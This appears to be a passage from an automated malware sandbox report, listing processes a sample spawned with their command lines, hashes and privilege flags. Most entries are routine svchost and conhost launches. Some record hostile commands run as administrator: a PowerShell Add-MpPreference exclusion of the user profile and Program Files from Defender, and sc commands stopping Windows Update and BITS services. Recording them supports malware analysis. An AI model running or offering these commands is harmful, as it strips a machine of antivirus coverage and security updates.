                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:36
                                      Start time:13:30:03
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s FontCache
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:37
                                      Start time:13:30:04
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:38
                                      Start time:13:30:04
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                      Imagebase:0x7ff7466a0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:39
                                      Start time:13:30:04
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:40
                                      Start time:13:30:05
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s nsi
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:41
                                      Start time:13:30:06
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:42
                                      Start time:13:30:06
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:43
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                      Imagebase:0x7ff7cb270000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:44
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:45
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:46
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop UsoSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:47
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop WaaSMedicSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:48
                                      Start time:13:30:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop wuauserv
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:49
                                      Start time:13:30:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:50
                                      Start time:13:30:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop bits
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      No disassembly